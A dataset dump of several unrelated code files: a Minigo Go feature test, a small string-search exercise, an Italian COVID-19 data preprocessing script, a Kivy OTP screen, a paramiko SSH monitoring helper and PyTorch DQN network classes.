EMPTY_ROW * 5)\n\nTEST_POSITION = go.Position(\n board=TEST_BOARD,\n n=3,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=(go.PlayerMove(go.BLACK, (0, 1)),\n go.PlayerMove(go.WHITE, (0, 8)),\n go.PlayerMove(go.BLACK, (1, 0))),\n to_play=go.BLACK,\n)\n\nTEST_BOARD2 = test_utils.load_board('''\n.XOXXOO..\nXO.OXOX..\nXXO..X...\n''' + EMPTY_ROW * 6)\n\nTEST_POSITION2 = go.Position(\n board=TEST_BOARD2,\n n=0,\n komi=6.5,\n caps=(0, 0),\n ko=None,\n recent=tuple(),\n to_play=go.BLACK,\n)\n\n\nTEST_POSITION3 = go.Position()\nfor coord in ((0, 0), (0, 1), (0, 2), (0, 3), (1, 1)):\n TEST_POSITION3.play_move(coord, mutate=True)\n# resulting position should look like this:\n# X.XO.....\n# .X.......\n# .........\n\n\nclass TestFeatureExtraction(test_utils.MinigoUnitTest):\n def test_stone_features(self):\n f = features.stone_features(TEST_POSITION3)\n self.assertEqual(go.WHITE, TEST_POSITION3.to_play)\n self.assertEqual((9, 9, 16), f.shape)\n self.assertEqualNPArray(f[:, :, 0], test_utils.load_board('''\n ...X.....\n .........''' + EMPTY_ROW * 7))\n\n self.assertEqualNPArray(f[:, :, 1], test_utils.load_board('''\n X.X......\n .X.......''' + EMPTY_ROW * 7))\n\n self.assertEqualNPArray(f[:, :, 2], test_utils.load_board('''\n .X.X.....\n .........''' + EMPTY_ROW * 7))\n\n self.assertEqualNPArray(f[:, :, 3], test_utils.load_board('''\n X.X......\n .........''' + EMPTY_ROW * 7))\n\n self.assertEqualNPArray(f[:, :, 4], test_utils.load_board('''\n .X.......\n .........''' + EMPTY_ROW * 7))\n\n self.assertEqualNPArray(f[:, :, 5], test_utils.load_board('''\n X.X......\n .........''' + EMPTY_ROW * 7))\n\n all_zeros = np.zeros([go.N, go.N])\n for i in range(10, 16):\n self.assertEqualNPArray(all_zeros, f[:, :, i])\n\n def test_stone_color_feature(self):\n f = features.stone_color_feature(TEST_POSITION)\n self.assertEqual((9, 9, 3), f.shape)\n # plane 0 is B\n self.assertEqual(1, f[0, 1, 0])\n self.assertEqual(0, f[0, 1, 1])\n # plane 1 is W\n self.assertEqual(0, f[0, 8, 0])\n self.assertEqual(1, f[0, 8, 1])\n # plane 2 is empty\n self.assertEqual(1, f[0, 5, 2])\n self.assertEqual(0, f[0, 5, 1])\n\n def test_liberty_feature(self):\n f = features.liberty_feature(TEST_POSITION)\n self.assertEqual(f.shape, (9, 9, features.liberty_feature.planes))\n\n self.assertEqual(0, f[0, 0, 0])\n # the stone at 0, 1 has 3 liberties.\n self.assertEqual(1, f[0, 1, 2])\n self.assertEqual(0, f[0, 1, 4])\n # the group at 0, 7 has 3 liberties\n self.assertEqual(1, f[0, 7, 2])\n self.assertEqual(1, f[0, 8, 2])\n # the group at 1, 0 has 18 liberties\n self.assertEqual(1, f[1, 0, 7])\n\n def test_few_liberties_feature(self):\n f = features.few_liberties_feature(TEST_POSITION)\n self.assertEqual(\n f.shape, (9, 9, features.few_liberties_feature.planes))\n\n self.assertEqualNPArray([0, 0, 0], f[0, 0])\n # the stone at 0, 1 has 3 liberties.\n self.assertEqualNPArray([0, 0, 1], f[0, 1])\n # the group at 0, 7 has 3 liberties.\n self.assertEqualNPArray([0, 0, 1], f[0, 7])\n self.assertEqualNPArray([0, 0, 1], f[0, 8])\n # the group at 1, 0 has 18 liberties but few_liberties_feature only has\n # non-zero entries for groups with {1, 2, 3} liberties.\n self.assertEqualNPArray([0, 0, 0], f[0, 0])\n # the group at 3, 0 has 1 liberty.\n self.assertEqualNPArray([1, 0, 0], f[3, 0])\n # the group at 3, 8 has 2 liberties.\n self.assertEqualNPArray([0, 1, 0], f[3, 8])\n\n def test_recent_moves_feature(self):\n f = features.recent_move_feature(TEST_POSITION)\n self.assertEqual(f.shape, (9, 9, features.recent_move_feature.planes))\n # most recent move at (1, 0)\n self.assertEqual(1, f[1, 0, 0])\n self.assertEqual(0, f[1, 0, 3])\n # second most recent move at (0, 8)\n self.assertEqual(1, f[0, 8, 1])\n self.assertEqual(0, f[0, 8, 0])\n # third most recent move at (0, 1)\n self.assertEqual(1, f[0, 1, 2])\n # no more older moves\n self.assertEqualNPArray(np.zeros([9, 9]), f[:, :, 3])\n self.assertEqualNPArray(\n np.zeros([9, 9]), f[:, :, features.recent_move_feature.planes - 1])\n\n def test_would_capture_feature(self):\n f = features.would_capture_feature(TEST_POSITION2)\n self.assertEqual(\n (9, 9, features.would_capture_feature.planes), f.shape)\n # move at (1, 2) would capture 2 stones\n self.assertEqualNPArray([1], f[1, 2])\n # move at (0, 0) should not capture stones because it's B's move.\n self.assertEqualNPArray([0], f[0, 0])\n # move at (0, 7) would capture 3 stones\n self.assertEqualNPArray([1], f[0, 7])\n","repo_name":"tensorflow/minigo","sub_path":"tests/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","stars":3409,"dataset":"github-code","pt":"77"} +{"seq_id":"29468906359","text":"def buscarTodas(a,b):\n cont = 0\n lista = list(a)\n acumul = \"\"\n for letras in a:\n if lista [cont] == b:\n acumul += str(cont) + \" \"\n cont += 1\n o = list(acumul)\n listaA = len(o)\n del o [listaA - 1] \n o = \"\".join(o)\n return(o)\nprint(buscarTodas(\"tres tristes tigres\",\"t\"))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej2/tema8_ej2_93161a680455ac82ba5c8aa8ca35a71f.py","file_name":"tema8_ej2_93161a680455ac82ba5c8aa8ca35a71f.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41710800452","text":"# Lint as: python3\n\"\"\"\nThis script preprocesses the covid19 data from Italy Department of Civil\nProtection for importing into Data Commons.\n\"\"\"\n\nimport pandas as pd\n\n\nclass PcmDpc:\n \"\"\"Download the csv files and preprocess it for importing into\n DataCommons.\"\"\"\n\n def preprocess(self):\n \"\"\"Clean and save the CSV file.\"\"\"\n self.data = pd.read_csv(self.csvpath)\n assert 'note' in self.data.columns\n self.data = self.data.drop(columns=['note'])\n self._translate()\n # Drop the time, keep the date only.\n self.data['Date'] = self.data['Date'].str[0:10]\n self.set_location() # Prepocess the geo ids.\n self.data.to_csv(self.name + '.csv', index=False)\n\n def generate_tmcf(self):\n \"\"\"Generate the template mcf.\"\"\"\n geo_node = self.geo_template() # Write the geo node to template mcf.\n TEMPLATE = ('Node: E:pcm-dpc->E{index}\\n'\n 'typeOf: dcs:StatVarObservation\\n'\n 'variableMeasured: dcs:{SVname}\\n'\n 'observationAbout: {geoNode}\\n'\n 'observationDate: C:pcm-dpc->Date\\n'\n 'value: C:pcm-dpc->{SVname}\\n\\n')\n idx = 1\n with open(self.name + '.tmcf', 'a') as f_out:\n for statvar in self.stat_vars:\n f_out.write(\n TEMPLATE.format_map({\n 'index': idx,\n 'SVname': statvar,\n 'geoNode': geo_node\n }))\n idx += 1\n\n def _translate(self):\n \"\"\"Translate coloumn names from italian to english.\"\"\"\n it2en = {\n 'data': 'Date',\n 'stato': 'State',\n 'codice_regione': 'RegionCode',\n 'denominazione_regione': 'RegionName',\n 'codice_provincia': 'ProvinceCode',\n 'denominazione_provincia': 'ProvinceName',\n 'sigla_provincia': 'ProvinceAbbreviation',\n 'lat': 'Latitude',\n 'long': 'Longitude',\n 'ricoverati_con_sintomi':\n ('Count_MedicalConditionIncident'\n '_COVID_19_PatientHospitalizedWithSymptoms'),\n 'terapia_intensiva': ('Count_MedicalConditionIncident'\n '_COVID_19_PatientInICU'),\n 'totale_ospedalizzati': ('Count_MedicalConditionIncident'\n '_COVID_19_PatientHospitalized'),\n 'isolamento_domiciliare': ('Count_MedicalConditionIncident'\n '_COVID_19_PatientInHomeIsolation'),\n 'totale_positivi': ('Count_MedicalConditionIncident'\n '_COVID_19_ActiveCase'),\n 'variazione_totale_positivi':\n ('IncrementalCount_Medical'\n 'ConditionIncident_COVID_19_PositiveCase'),\n 'nuovi_positivi': ('IncrementalCount_MedicalConditionIncident'\n '_COVID_19_ActiveCase'),\n 'dimessi_guariti': ('CumulativeCount_MedicalConditionIncident'\n '_COVID_19_PatientRecovered'),\n 'deceduti': ('CumulativeCount_MedicalConditionIncident_COVID_19'\n '_PatientDeceased'),\n 'totale_casi': ('CumulativeCount_MedicalConditionIncident_'\n 'COVID_19_PositiveCase'),\n 'tamponi': 'CumulativeCount_MedicalTest_COVID_19',\n 'casi_testati': 'CumulativeCount_Person_COVID_19_Tested',\n 'casi_da_sospetto_diagnostico': 'PositiveCasesFromClinicActivity',\n 'casi_da_screening': 'PositiveCasesFromSurveyAndTest'\n }\n for col in self.data.columns:\n assert col in it2en\n self.data = self.data.rename(columns=it2en)\n\n def set_location(self):\n raise NotImplementedError\n\n def geo_template(self):\n raise NotImplementedError\n\n\n_STAT_VARS = [('Count_MedicalConditionIncident_COVID_19_'\n 'PatientHospitalizedWithSymptoms'),\n 'Count_MedicalConditionIncident_COVID_19_PatientInICU',\n ('Count_MedicalConditionIncident_COVID_19_'\n 'PatientHospitalized'),\n ('Count_MedicalConditionIncident_COVID_19_'\n 'PatientInHomeIsolation'),\n 'Count_MedicalConditionIncident_COVID_19_ActiveCase',\n ('IncrementalCount_MedicalConditionIncident_COVID_19_'\n 'PositiveCase'),\n ('IncrementalCount_MedicalConditionIncident_COVID_19_'\n 'ActiveCase'),\n ('CumulativeCount_MedicalConditionIncident_COVID_19_'\n 'PatientRecovered'),\n ('CumulativeCount_MedicalConditionIncident_COVID_19'\n '_PatientDeceased'),\n ('CumulativeCount_MedicalConditionIncident_'\n 'COVID_19_PositiveCase'), 'CumulativeCount_MedicalTest_COVID_19',\n 'CumulativeCount_Person_COVID_19_Tested']\n\n\nclass PcmDpcNational(PcmDpc):\n \"\"\"Subclass processing national data.\"\"\"\n\n def __init__(self):\n self.csvpath = ('https://raw.githubusercontent.com/pcm-dpc/COVID-19/'\n 'master/dati-andamento-nazionale/dpc-covid19-ita-and'\n 'amento-nazionale.csv')\n self.name = \"dpc-covid19-ita-national-trend\"\n self.stat_vars = _STAT_VARS\n\n def set_location(self):\n assert (self.data['State'] == 'ITA').all()\n self.data = self.data.drop(columns=['State'])\n\n def geo_template(self):\n return 'dcid:country/ITA'\n\n\nclass PcmDpcRegions(PcmDpc):\n \"\"\"Subclass processing regional data.\"\"\"\n\n def __init__(self):\n self.csvpath = ('https://raw.githubusercontent.com/pcm-dpc/COVID-19/'\n 'master/dati-regioni/dpc-covid19-ita-regioni.csv')\n self.name = \"dpc-covid19-ita-regional\"\n self.stat_vars = _STAT_VARS\n\n def set_location(self):\n region_code_path = 'ISTAT_code/ISTAT_region.csv'\n region_code = pd.read_csv(region_code_path)[['Region Code', 'NUTS2']]\n code_dict = region_code.set_index('Region Code').to_dict()['NUTS2']\n # Region code 21 and 22 is missing from the dict above; add manually here.\n code_dict[21] = 'nuts/ITH1'\n code_dict[22] = 'nuts/ITH2'\n self.data['Location'] = self.data['RegionCode'].map(code_dict)\n self.data = self.data.drop(columns=[\n 'State', 'RegionCode', 'RegionName', 'Latitude', 'Longitude'\n ])\n\n def geo_template(self):\n GEO_TEMPLATE = ('Node: E:pcm-dpc->E0\\n'\n 'typeOf: dcs:EurostatNUTS2\\n'\n 'dcid: C:pcm-dpc->Location\\n\\n')\n with open(self.name + '.tmcf', 'w') as f_out:\n f_out.write(GEO_TEMPLATE)\n return 'E:pcm-dpc->E0'\n\n\nclass PcmDpcProvinces(PcmDpc):\n \"\"\"Subclass of provinces data.\"\"\"\n\n def __init__(self):\n self.csvpath = ('https://raw.githubusercontent.com/pcm-dpc/COVID-19/'\n 'master/dati-province/dpc-covid19-ita-province.csv')\n self.name = \"dpc-covid19-ita-province\"\n self.stat_vars = [\n 'CumulativeCount_MedicalConditionIncident_'\n 'COVID_19_PositiveCase'\n ]\n\n def set_location(self):\n province_code_path = 'ISTAT_code/ISTAT_province.csv'\n province_code = pd.read_csv(province_code_path)[[\n 'Province Abbreviation', 'NUTS3'\n ]]\n province_dict = (\n province_code.set_index('Province Abbreviation').to_dict()['NUTS3'])\n # Drop the data whose location is \"being defined/updated\",\n # i.e. ProvinceCode > 111.\n # Location Sud Sardegna (Province Code = 111) is not defined as a\n # unique area in DataCommons, skip for now.\n self.data = self.data[self.data['ProvinceCode'] < 111].reset_index()\n self.data['Location'] = self.data['ProvinceAbbreviation'].map(\n province_dict)\n self.data = self.data[[\n 'Date', 'Location', 'CumulativeCount_Medical'\n 'ConditionIncident_COVID_19_PositiveCase'\n ]]\n\n def geo_template(self):\n GEO_TEMPLATE = ('Node: E:pcm-dpc->E0\\n'\n 'typeOf: dcs:EurostatNUTS3\\n'\n 'dcid: C:pcm-dpc->Location\\n\\n')\n with open(self.name + '.tmcf', 'w') as f_out:\n f_out.write(GEO_TEMPLATE)\n return 'E:pcm-dpc->E0'\n\n\ndef main():\n \"\"\"Process the national, regional, provinces data and generate\n corresponding template mcfs.\"\"\"\n for data in [PcmDpcNational(), PcmDpcRegions(), PcmDpcProvinces()]:\n data.preprocess()\n data.generate_tmcf()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"datacommonsorg/data","sub_path":"scripts/pcm-dpc/covid-19/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"77"} +{"seq_id":"13100756648","text":"from kivy.uix.screenmanager import Screen\nfrom kivy.network.urlrequest import UrlRequest\nimport json\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDRaisedButton\nfrom Integrated_Api_Function.url import Base_Url\n\nclass OTPScreen(Screen):\n\n def __init__(self, **kwargs):\n super(OTPScreen, self).__init__(**kwargs)\n self.url ='{}/email_otp/'.format(Base_Url)\n self.request = None \n \n def send_otp_request(self):\n otp = self.ids.otp_field.text\n \n payload = {\n 'otp': otp,\n }\n self.request = UrlRequest(\n self.url,\n on_success=self.on_otp_success,\n on_failure=self.on_otp_failure,\n req_body=json.dumps(payload),\n req_headers={'Content-type': 'application/json'}\n )\n\n def on_otp_success(self, request, result):\n print(\"result success------>\",result)\n dialog = MDDialog(\n title=\"Success\",\n text=result['message'],\n buttons=[\n MDRaisedButton(\n text=\"OK\",\n on_release=self.dismiss_success_dialog\n )\n ]\n )\n dialog.open()\n \n def dismiss_success_dialog(self, *args):\n self.manager.current = 'reset_password'\n\n def on_otp_failure(self, request, result):\n print(\"resultfailure------>\",result)\n dialog = MDDialog(\n title=\"Error\",\n text=result['message'],\n buttons=[\n MDRaisedButton(\n text=\"OK\",\n on_release=self.dismiss_failure_dialog\n )\n ]\n )\n dialog.open()\n \n def dismiss_failure_dialog(self, *args):\n self.manager.current = 'OTP_Screen'","repo_name":"webdeveloper510/Kivy_Fridge_App_Frontend","sub_path":"Integrated_Api_Function/validateotp.py","file_name":"validateotp.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3223434418","text":"import logging\nimport os\n\nimport paramiko\nfrom configs import config\n\nport = 22\nparamiko.util.log_to_file(config.sshLogPath)\n\n\nclass SSH:\n def __init__(self):\n self.ssh_conns = {}\n self.command = ''\n\n def register_command(self, command):\n self.command = command\n\n def setup_connection_to_host(self, hostname):\n if hostname in self.ssh_conns:\n return None\n\n logger = paramiko.util.logging.getLogger()\n logging.getLogger(\"paramiko\").setLevel(logging.WARNING)\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.WarningPolicy())\n\n # ssh_config = paramiko.SSHConfig()\n # user_config_file = os.path.expanduser(\"~/.ssh/config\")\n # with io.open(user_config_file, 'rt', encoding='utf-8') as f:\n # ssh_config.parse(f)\n # host_conf = ssh_config.lookup(hostname)\n # if host_conf:\n # if 'proxycommand' in host_conf:\n # cfg['sock'] = paramiko.ProxyCommand(host_conf['proxycommand'])\n\n key = paramiko.RSAKey.from_private_key_file(config.sshKeyPath, password=os.getenv(\"SSH_PASSWORD\"))\n logging.info(f'connecting to {hostname}')\n client.connect(hostname=hostname, username=os.getenv(\"SSH_USER\"), pkey=key, password=os.getenv(\"SSH_PASSWORD\"))\n logging.info(f'connected to {hostname}')\n\n self.ssh_conns[hostname] = client\n\n def setup_connections_to_hosts(self, hostnames):\n for hostname in hostnames:\n try:\n self.setup_connection_to_host(hostname)\n except paramiko.AuthenticationException as err:\n logging.warning(f'{hostname} ssh authentication failed with err {err}')\n except paramiko.SSHException as err:\n logging.warning(f'{hostname} ssh setup failed with err {err}')\n except Exception as err:\n logging.error(f'{hostname} exec failed with err {err}')\n\n def exec_on_all_machines(self, hostnames, command):\n res = {}\n for hostname in hostnames:\n res[hostname] = self.exec_on_machine(hostname, command)\n return res\n\n def exec_on_machine(self, hostname, command):\n if hostname not in self.ssh_conns:\n try:\n self.setup_connection_to_host(hostname)\n except paramiko.AuthenticationException as err:\n logging.warning(f'{hostname} ssh authentication failed with err {err}')\n return None, False\n except paramiko.SSHException as err:\n logging.warning(f'{hostname} ssh setup failed with err {err}')\n return None, False\n except Exception as err:\n logging.error(f'{hostname} exec failed with err {err}')\n return None, False\n\n client = self.ssh_conns[hostname]\n _, stdout, stderr = client.exec_command(command)\n return SSHOutput(stdout, stderr), True\n\n\nclass SSHOutput:\n def __init__(self, stdout, stderr):\n self.stdout = stdout\n self.stderr = stderr\n","repo_name":"moziliar/deployment-and-monitoring","sub_path":"bot/src/monitor/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72650315449","text":"import torch\nimport torch.nn as nn\n\n\nclass Network2D(nn.Module):\n\n def __init__(self, agents, frame_history, number_actions):\n super(Network2D, self).__init__()\n self.agents = agents\n self.frame_history = frame_history\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.conv0 = nn.Conv3d(\n in_channels=frame_history,\n out_channels=32,\n kernel_size=(5, 5, 5)).to(\n self.device)\n self.maxpool0 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu0 = nn.PReLU().to(self.device)\n self.conv1 = nn.Conv3d(\n in_channels=32,\n out_channels=32,\n kernel_size=(5, 5, 5)).to(\n self.device)\n self.maxpool1 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu1 = nn.PReLU().to(self.device)\n self.conv2 = nn.Conv3d(\n in_channels=32,\n out_channels=64,\n kernel_size=(4, 4, 4)).to(\n self.device)\n self.maxpool2 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu2 = nn.PReLU().to(self.device)\n self.conv3 = nn.Conv3d(\n in_channels=64,\n out_channels=64,\n kernel_size=(3, 3, 3)).to(\n self.device)\n self.prelu3 = nn.PReLU().to(self.device)\n\n self.fc1 = nn.Linear(in_features=512, out_features=256).to(self.device)\n self.prelu4 = nn.LeakyReLU().to(self.device)\n self.fc2 = nn.Linear(in_features=256, out_features=128).to(self.device)\n self.prelu5 = nn.LeakyReLU().to(self.device)\n self.fc3 = nn.Linear(\n in_features=128,\n out_features=number_actions).to(\n self.device)\n\n def forward(self, input):\n \"\"\"\n Input is a tensor of size\n (batch_size, agents, frame_history, *image_size)\n \"\"\"\n input = input.to(self.device) / 255.0\n\n # Shared layers\n x = input.squeeze(1) # input[:, 0]\n x = self.conv0(x)\n x = self.prelu0(x)\n x = self.maxpool0(x)\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.maxpool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.maxpool2(x)\n x = x.view(-1, 512)\n\n # Individual layers\n x = self.fc1(x)\n x = self.prelu4(x)\n x = self.fc2(x)\n x = self.prelu5(x)\n x = self.fc3(x)\n output = x.unsqueeze(1)\n return output.cpu()\n\n\nclass Network3D(nn.Module):\n\n def __init__(self, agents, frame_history, number_actions, xavier=True):\n super(Network3D, self).__init__()\n\n self.agents = agents\n self.frame_history = frame_history\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.conv0 = nn.Conv3d(\n in_channels=frame_history,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool0 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu0 = nn.PReLU().to(self.device)\n self.conv1 = nn.Conv3d(\n in_channels=32,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool1 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu1 = nn.PReLU().to(self.device)\n self.conv2 = nn.Conv3d(\n in_channels=32,\n out_channels=64,\n kernel_size=(4, 4, 4),\n padding=1).to(\n self.device)\n self.maxpool2 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu2 = nn.PReLU().to(self.device)\n self.conv3 = nn.Conv3d(\n in_channels=64,\n out_channels=64,\n kernel_size=(3, 3, 3),\n padding=0).to(\n self.device)\n self.prelu3 = nn.PReLU().to(self.device)\n\n self.fc1 = nn.ModuleList(\n [nn.Linear(in_features=512, out_features=256).to(\n self.device) for _ in range(self.agents)])\n self.prelu4 = nn.ModuleList(\n [nn.PReLU().to(self.device) for _ in range(self.agents)])\n self.fc2 = nn.ModuleList(\n [nn.Linear(in_features=256, out_features=128).to(\n self.device) for _ in range(self.agents)])\n self.prelu5 = nn.ModuleList(\n [nn.PReLU().to(self.device) for _ in range(self.agents)])\n self.fc3 = nn.ModuleList(\n [nn.Linear(in_features=128, out_features=number_actions).to(\n self.device) for _ in range(self.agents)])\n\n if xavier:\n for module in self.modules():\n if type(module) in [nn.Conv3d, nn.Linear]:\n torch.nn.init.xavier_uniform(module.weight)\n\n def forward(self, input):\n \"\"\"\n Input is a tensor of size\n (batch_size, agents, frame_history, *image_size)\n Output is a tensor of size\n (batch_size, agents, number_actions)\n \"\"\"\n input = input.to(self.device) / 255.0\n output = []\n for i in range(self.agents):\n # Shared layers\n x = input[:, i]\n x = self.conv0(x)\n x = self.prelu0(x)\n x = self.maxpool0(x)\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.maxpool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.maxpool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.view(-1, 512)\n # Individual layers\n x = self.fc1[i](x)\n x = self.prelu4[i](x)\n x = self.fc2[i](x)\n x = self.prelu5[i](x)\n x = self.fc3[i](x)\n output.append(x)\n output = torch.stack(output, dim=1)\n return output.cpu()\n\n\nclass CommNet(nn.Module):\n\n def __init__(self, agents, frame_history, number_actions, xavier=True):\n super(CommNet, self).__init__()\n\n self.agents = agents\n self.frame_history = frame_history\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.conv0 = nn.Conv3d(\n in_channels=frame_history,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool0 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu0 = nn.PReLU().to(self.device)\n self.conv1 = nn.Conv3d(\n in_channels=32,\n out_channels=32,\n kernel_size=(5, 5, 5),\n padding=1).to(\n self.device)\n self.maxpool1 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu1 = nn.PReLU().to(self.device)\n self.conv2 = nn.Conv3d(\n in_channels=32,\n out_channels=64,\n kernel_size=(4, 4, 4),\n padding=1).to(\n self.device)\n self.maxpool2 = nn.MaxPool3d(kernel_size=(2, 2, 2)).to(self.device)\n self.prelu2 = nn.PReLU().to(self.device)\n self.conv3 = nn.Conv3d(\n in_channels=64,\n out_channels=64,\n kernel_size=(3, 3, 3),\n padding=0).to(\n self.device)\n self.prelu3 = nn.PReLU().to(self.device)\n\n self.fc1 = nn.ModuleList(\n [nn.Linear(\n in_features=512 * 2,\n out_features=256).to(\n self.device) for _ in range(\n self.agents)])\n self.prelu4 = nn.PReLU().to(self.device)\n self.fc2 = nn.ModuleList(\n [nn.Linear(\n in_features=256 * 2,\n out_features=128).to(\n self.device) for _ in range(\n self.agents)])\n self.prelu5 = nn.PReLU().to(self.device)\n self.fc3 = nn.ModuleList(\n [nn.Linear(\n in_features=128 * 2,\n out_features=number_actions).to(\n self.device) for _ in range(\n self.agents)])\n\n if xavier:\n for module in self.modules():\n if type(module) in [nn.Conv3d, nn.Linear]:\n torch.nn.init.xavier_uniform(module.weight)\n\n def forward(self, input):\n \"\"\"\n # Input is a tensor of size\n (batch_size, agents, frame_history, *image_size)\n # Output is a tensor of size\n (batch_size, agents, number_actions)\n \"\"\"\n input1 = input.to(self.device) / 255.0\n\n # Shared layers\n input2 = []\n for i in range(self.agents):\n x = input1[:, i]\n x = self.conv0(x)\n x = self.prelu0(x)\n x = self.maxpool0(x)\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.maxpool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.maxpool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.view(-1, 512)\n input2.append(x)\n input2 = torch.stack(input2, dim=1)\n\n # Communication layers\n comm = torch.mean(input2, axis=1)\n input3 = []\n for i in range(self.agents):\n x = input2[:, i]\n x = self.fc1[i](torch.cat((x, comm), axis=-1))\n input3.append(x)\n input3 = torch.stack(input3, dim=1)\n input3 = self.prelu4(input3)\n\n comm = torch.mean(input3, axis=1)\n input4 = []\n for i in range(self.agents):\n x = input3[:, i]\n x = self.fc2[i](torch.cat((x, comm), axis=-1))\n input4.append(x)\n input4 = torch.stack(input4, dim=1)\n input4 = self.prelu5(input4)\n\n comm = torch.mean(input4, axis=1)\n output = []\n for i in range(self.agents):\n x = input4[:, i]\n x = self.fc3[i](torch.cat((x, comm), axis=-1))\n output.append(x)\n output = torch.stack(output, dim=1)\n\n return output.cpu()\n\n\nclass DQN:\n # The class initialisation function.\n def __init__(\n self,\n agents,\n frame_history,\n logger,\n number_actions=6,\n type=\"Network3d\"):\n self.agents = agents\n self.number_actions = number_actions\n self.frame_history = frame_history\n self.logger = logger\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.logger.log(f\"Using {self.device}\")\n # Create a Q-network, which predicts the q-value for a particular state\n if type == \"Network3d\":\n self.q_network = Network3D(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n self.target_network = Network3D(\n agents, frame_history, number_actions).to(\n self.device)\n elif type == \"CommNet\":\n self.q_network = CommNet(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n self.target_network = CommNet(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n elif type == \"Network2d\":\n self.q_network = Network2D(\n agents,\n frame_history,\n number_actions).to(\n self.device)\n self.target_network = Network2D(\n agents, frame_history, number_actions).to(\n self.device)\n self.copy_to_target_network()\n # Freezes target network\n self.target_network.train(False)\n for p in self.target_network.parameters():\n p.requires_grad = False\n # Define the optimiser which is used when updating the Q-network. The\n # learning rate determines how big each gradient step is during\n # backpropagation.\n self.optimiser = torch.optim.Adam(self.q_network.parameters(), lr=1e-3)\n self.scheduler = torch.optim.lr_scheduler.StepLR(\n self.optimiser, step_size=50, gamma=0.5)\n\n def copy_to_target_network(self):\n self.target_network.load_state_dict(self.q_network.state_dict())\n\n def save_model(self, name=\"dqn.pt\", forced=False):\n self.logger.save_model(self.q_network.state_dict(), name, forced)\n\n # Function that is called whenever we want to train the Q-network. Each\n # call to this function takes in a transition tuple containing the data we\n # use to update the Q-network.\n def train_q_network(self, transitions, discount_factor):\n # Set all the gradients stored in the optimiser to zero.\n self.optimiser.zero_grad()\n # Calculate the loss for this transition.\n loss = self._calculate_loss(transitions, discount_factor)\n # Compute the gradients based on this loss, i.e. the gradients of the\n # loss with respect to the Q-network parameters.\n loss.backward()\n # Take one gradient step to update the Q-network.\n self.optimiser.step()\n return loss.item()\n\n def _calculate_loss_tf(self, transitions, discount_factor):\n import tensorflow as tf\n curr_state = transitions[0]\n self.predict_value = tf.convert_to_tensor(\n self.q_network.forward(\n torch.tensor(curr_state)).view(\n -1,\n self.number_actions).detach().numpy(),\n dtype=tf.float32) # Only works for 1 agent\n reward = tf.squeeze(\n tf.clip_by_value(\n tf.convert_to_tensor(\n transitions[2], dtype=tf.float32), -1, 1), [1])\n next_state = transitions[3]\n action_onehot = tf.squeeze(tf.one_hot(\n transitions[1], 6, 1.0, 0.0), [1])\n\n pred_action_value = tf.reduce_sum(\n self.predict_value * action_onehot, 1) # N,\n # max_pred_reward = tf.reduce_mean(tf.reduce_max(\n # self.predict_value, 1), name='predict_reward')\n with tf.variable_scope('target'):\n targetQ_predict_value = tf.convert_to_tensor(\n self.q_network.forward(torch.tensor(\n next_state)).view(-1, self.number_actions)\n .detach().numpy(),\n dtype=tf.float32) # NxA\n\n best_v = tf.reduce_max(targetQ_predict_value, 1) # N,\n target = reward + discount_factor * tf.stop_gradient(best_v)\n\n cost = tf.losses.huber_loss(target, pred_action_value,\n reduction=tf.losses.Reduction.MEAN)\n with tf.Session() as _:\n print(\"cost\", cost.eval())\n\n # Function to calculate the loss for a particular transition.\n def _calculate_loss(self, transitions, discount_factor):\n '''\n Transitions are tuple of shape\n (states, actions, rewards, next_states, dones)\n '''\n curr_state = torch.tensor(transitions[0])\n next_state = torch.tensor(transitions[3])\n terminal = torch.tensor(transitions[4]).type(torch.int)\n\n rewards = torch.clamp(\n torch.tensor(\n transitions[2], 